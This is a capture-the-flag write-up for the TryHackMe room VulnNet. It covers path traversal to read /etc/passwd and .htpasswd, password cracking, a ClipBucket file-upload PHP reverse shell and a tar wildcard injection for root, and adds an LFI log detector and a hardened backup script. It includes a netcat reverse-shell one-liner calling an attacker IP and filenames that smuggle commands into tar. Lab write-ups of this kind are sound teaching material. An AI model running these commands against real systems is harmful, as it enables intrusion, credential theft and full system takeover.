# VulnNet

## Nmap

```
sudo nmap 10.10.14.164 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### Web Server

Investigating port 80, we are welcomed to the VulnNet Entertainment landing page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FBmXkcrDjG9pqP1XLCjsW%2Fimage.png?alt=media\&token=ac7abf7e-dee4-4ea3-a5f0-606ffb461beb)

### Path Traversal

Starting enumeration with ZAP's active scan feature, we detect a high alert for a path traversal vulnerability.

```
http://vulnnet.thm/index.php?referer=/etc/passwd
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FNcjyx7U9CXYP72RxvY2g%2Fimage.png?alt=media\&token=8f505c4a-2ff8-4c6e-b5a8-fe2153f6e034)

Whilst the path traversal works, the results are not visible on the rendered page; they only appear when viewing the source of `/index.php`.

```
view-source:https://vulnnet.thm/index.php?referer=%2Fetc%2Fpasswd
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F151DCTkJq3elozMm7UJJ%2Fimage.png?alt=media\&token=4cd62a74-f7cd-4e61-af6d-586423b1d35e)
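The traversal above rides on the `referer` query parameter, and the URL-encoded form (`%2Fetc%2Fpasswd`) is how it appears in the web server's access log. As an added example, not part of the original writeup, the script below percent-decodes that parameter from Apache-style access-log lines (constructed for this example) and flags requests whose value is an absolute path or contains `../`:

```shell
#!/bin/bash
# Added example, not part of the writeup: flag access-log requests whose
# "referer" query parameter carries an absolute path or a "../" sequence.
# The log lines below are constructed in the Apache combined-log layout.

# Percent-decode a string (the %2F form the writeup shows).
urldecode() {
    local s="${1//+/ }"
    printf '%b' "${s//%/\\x}"
}

# Read access-log lines on stdin; print "<ip> <decoded value>" for each
# request whose decoded referer value starts with "/" or contains "../".
flag_lfi_requests() {
    local line ip req raw value
    while IFS= read -r line; do
        ip=${line%% *}
        # The request line sits between the first pair of double quotes.
        req=${line#*\"}; req=${req%%\"*}
        case "$req" in *referer=*) ;; *) continue ;; esac
        raw=${req#*referer=}        # drop everything up to the parameter name
        raw="${raw%%[& ]*}"         # cut at the next parameter or the space
        value=$(urldecode "$raw")
        case "$value" in
            /*|*../*) printf '%s %s\n' "$ip" "$value" ;;
        esac
    done
}

# Constructed sample: two traversal attempts, one benign value, one .htpasswd read.
SAMPLE_LOG='10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?referer=%2Fetc%2Fpasswd HTTP/1.1" 200 1337
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?referer=index.php HTTP/1.1" 200 141
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?referer=/etc/apache2/.htpasswd HTTP/1.1" 200 98
10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?referer=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 141'

printf '%s\n' "$SAMPLE_LOG" | flag_lfi_requests
```

Only the three suspicious requests are printed; the benign `referer=index.php` line is skipped.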

### Enumeration

From `/etc/passwd` we obtain the username server-management. Using the same path traversal vulnerability, we then read the source of the `/index.php` page, located in `/var/www/html/`, to learn more about the application.

As shown in the image below, this reveals further details, including that the site is running ClipBucket version 4.0.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FsiPvZTEj16xRbhhcFqhb%2Fimage.png?alt=media\&token=6debf07d-1bfc-420d-8ec1-872a6bf213e3)

A quick search with `searchsploit` reveals multiple vulnerabilities for version 4.0.0.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FSvjPRqmQSfSXLtu4p9Dv%2Fimage.png?alt=media\&token=bdab6331-06e2-404b-8236-509e6afb6cbc)

**Exploit-db:** <https://www.exploit-db.com/exploits/44250>

However, I was unable to successfully complete any of the suggested exploits due to inaccessible required directories.

### Sub Domain Enumeration

Taking the enumeration further, we start fuzzing for subdomains on <http://vulnnet.thm>.

```
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://vulnnet.thm" -H "Host: FUZZ.vulnnet.thm" --hl 141
```

Looking at the results below, we get a 401 (Unauthorized) response code for the subdomain <http://broadcast.vulnnet.thm>.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F113sYE0RenfwgmZOFlW5%2Fimage.png?alt=media\&token=928daae4-0adf-40d2-beae-0e4be9226daa)

Adding the broadcast subdomain to our `/etc/hosts` file, we then browse to the new domain and are prompted for credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F3knpI9KwnZLkq8XOMi9y%2Fimage.png?alt=media\&token=126fe407-8ae1-481b-9f66-b90f73e8d282)

Brute forcing the login page with Hydra and the server-management user proved unsuccessful. Likewise, admin and root did not work either.

Back to enumeration...

### Further Enumeration

Building on the LFI vulnerability discovered by ZAP earlier, we start fuzzing for further files and get a valid hit on `/etc/apache2`.

```
wfuzz -u "http://vulnnet.thm/index.php?referer=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hl 141 -R 2
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2ujQC5iXyq9UdVLL6zU0%2Fimage.png?alt=media\&token=ef63a2d3-07cb-4477-afa1-3f2162fb5765)

Fuzzing for files within the `/etc/apache2` directory, we soon get a hit for `.htpasswd`.

```
wfuzz -u "http://vulnnet.thm/index.php?referer=/etc/apache2/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-files-lowercase.txt --hl 141 -R 2
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FBPl8SyPQjqhOm9WumXYx%2Fimage.png?alt=media\&token=00b6243b-0a04-4843-9cb3-5992bfc9def7)

Using `curl` we read the contents of `.htpasswd` and discover credentials within the file.

```
curl  "http://vulnnet.thm/index.php?referer=/etc/apache2/.htpasswd"
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fc0Nk08qInemLvuAtntwE%2Fimage.png?alt=media\&token=9f59034f-d840-4bb2-8685-22363b3ca120)

### Hashcat

Using hashcat (mode 1600, Apache `.htpasswd` hashes) against the rockyou.txt wordlist, we are soon able to crack the password.

```
hashcat -a 0 -m 1600 hash /usr/share/wordlists/rockyou.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FKJnZuVKshD0Ehid7XBsb%2Fimage.png?alt=media\&token=05f8db49-78af-4663-8137-97c20c9242af)

### Accessing ClipBucket

Using the newly discovered credentials for the user developers on the `http://broadcast.vulnnet.thm` web page, we are able to proceed and are greeted with the index page for ClipBucket.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FPO0H3Ugh4aJpdjeE8QkU%2Fimage.png?alt=media\&token=2a87c908-a317-43f3-b8b3-4f2b8f7854fa)

### Arbitrary File Upload / Shell

Going back to Exploit-DB, we can look again at the various vulnerabilities. In this instance I have chosen to proceed with the Unauthenticated Arbitrary File Upload.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FNfvuTX76VjoXKxTvBP7P%2Fimage.png?alt=media\&token=28b47357-cf2e-4413-bb3a-4faf7a2956bb)

Using the PHP Monkey reverse shell generated from [RevShells](https://revshells.com/), I then used the command below to perform the file upload.

```
curl -F "file=@shell.php" -F "plupload=1" -F "name=anyname.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php" -u developers:<Password>
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F267vbYCuax621TT3ZwAr%2Fimage.png?alt=media\&token=c0682bcf-2157-49f7-8157-f36924f8d438)

The response message includes the directory and name of the uploaded file. Using this information we start a netcat listener and browse to the uploaded reverse shell.

```
http://broadcast.vulnnet.thm/actions/CB_BEATS_UPLOAD_DIR/<FileName>.php
```

Gaining access as *www-data*.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FcckObdP6IsIidpIZn7rQ%2Fimage.png?alt=media\&token=baf8fa2f-0ff7-4e80-995b-db8be3956466)

From here we give ourselves a better shell experience.

```
/usr/bin/script -qc /bin/bash /dev/null
```

### Crontab

Performing basic enumeration steps on the target system we find the file `/var/opt/backupsrv.sh` is executed by **root** every two minutes.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2qQnirsMoIdJ6Cb9Z0OQ%2Fimage.png?alt=media\&token=1a661e6d-849e-47bd-87f8-648935575d28)

Viewing the contents of the file, we see that all files within `/home/server-management/Documents` are archived using `tar` every time the script is run.

```
#!/bin/bash

# Where to backup to.
dest="/var/backups"

# What to backup. 
cd /home/server-management/Documents
backup_files="*"

# Create archive filename.
day=$(date +%A)
hostname=$(hostname -s)
archive_file="$hostname-$day.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"
date
echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"
date

# Long listing of files in $dest to check file sizes.
ls -lh $dest
```

Reading the script, we see that `tar` is backing up files and that the command ends in an unquoted wildcard. I have previously documented performing privilege escalation with `tar` wildcard injection in the TryHackMe room Marketplace.

{% content-ref url="marketplace" %}
[marketplace](https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/linux/marketplace)
{% endcontent-ref %}

However, we have no permissions over `/home/server-management/Documents`, the directory being archived.

### Archive Extraction

Looking at the files already backed up and archived to `/var/opt/backups`, we notice two archived files of interest.

Extract these to a writeable directory:

```
tar -xf ssh-backup.tar.gz -C /tmp/
tar -xf vulnnet-Monday.tgz -C /tmp/
```

Of the extracted files, the `id_rsa` private key is of interest.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FtExoOjXFVECOCtoJh3aB%2Fimage.png?alt=media\&token=a04b6c6e-bfcd-42a7-bc25-5d812f1e4382)

Transferring the `id_rsa` key over to my attacking system, we are prompted for a passphrase when trying to use it to connect as the user *server-management*.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fo5pa9DEUqIOxOhquH0pa%2Fimage.png?alt=media\&token=3a0326b7-a910-4c8c-b024-088bb1f64471)

### Hashing and Cracking

Using ssh2john we can convert the key file into a crackable hash and then perform password cracking to reveal the plain text passphrase.

```
/usr/bin/ssh2john id_rsa >> hash_id
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fc9FNOl4qgyBSYpRw1Pbk%2Fimage.png?alt=media\&token=d52426fd-8120-4daf-bcdf-c08821c191dc)

### SSH as server-management

With the now discovered passphrase we are able to log in over `SSH` as the user *server-management*.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fz7y72OQLevIs267hv1lE%2Fimage.png?alt=media\&token=b7e6eef7-4690-4752-b475-622ff87a12ef)

### Tar wildcard injection

Revisiting the `/var/opt/backupsrv.sh` file we should now be able to perform privilege escalation as `/home/server-management/Documents` is within our home directory.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FxKjUpHhnwHCBa7gizg95%2Fimage.png?alt=media\&token=e019daee-a81c-460e-bdd8-a714c2aba1b7)

Referring again to the steps I performed for the Marketplace room, and ensuring we are running from the Documents folder:

```
# Write the reverse shell payload to shell.sh (the original command was missing the redirect)
echo "mkfifo /tmp/ydzhkhh; nc 10.11.54.237 8000 0</tmp/ydzhkhh | /bin/sh >/tmp/ydzhkhh 2>&1; rm /tmp/ydzhkhh" > shell.sh
# Create two files whose names tar will parse as options when the wildcard expands
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FFUQc2TtRUBbjJKcinIQw%2Fimage.png?alt=media\&token=879e9dfa-ad72-4df4-bd19-10b8071b1b25)
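The root cause in `backupsrv.sh` is that the unquoted `$backup_files` glob expands to filenames that `tar` then parses as options. As an added example (not the room's script), the rewrite below archives the same directory without ever letting a filename reach tar's option parser, and adds a pre-flight check that lists option-like names; the source and destination directories are passed as arguments rather than hard-coded:

```shell
#!/bin/bash
# Added example, not the room's script: a hardened rewrite of the
# backupsrv.sh routine plus a pre-flight check for option-like filenames.
# Source and destination directories are passed in rather than hard-coded.

# List entries of $1 whose names begin with "-". Such a name only becomes
# a tar option because an unquoted glob hands it to tar as an argument,
# so a cron job should log (or refuse to run on) these names.
find_option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' | sed 's#.*/##' | sort
}

# Archive every entry of $1 into $2/<host>-<day>.tgz without letting any
# filename reach tar's option parser. Prints the archive path on success.
# An empty source directory makes tar refuse to create an empty archive,
# which surfaces as a non-zero return code.
safe_backup() {
    local src="$1" dest="$2" day host archive_file
    day=$(date +%A)
    host=$(hostname -s 2>/dev/null || echo localhost)
    archive_file="$host-$day.tgz"

    # Feed tar NUL-separated "./name" paths on stdin: --null makes -T read
    # names verbatim, the "./" prefix means no name starts with "-", and no
    # shell glob is expanded at all. Quoting keeps a destination path with
    # spaces intact.
    ( cd "$src" || exit 1
      find . -mindepth 1 -maxdepth 1 -print0 |
        tar -czf "$dest/$archive_file" --null -T - ) || return 1
    printf '%s\n' "$dest/$archive_file"
}
```

With this version a file named `--checkpoint=1` ends up inside the archive as the member `./--checkpoint=1`, and `shell.sh` is never executed.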

### Shell as root

Start a netcat listener, wait a couple of minutes for the cron job to run, obtain a **root** shell and then grab the root.txt flag.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FTARDYw625Vvi3u1OGcVc%2Fimage.png?alt=media\&token=ab268307-415c-4172-9d64-eedf1883979d)
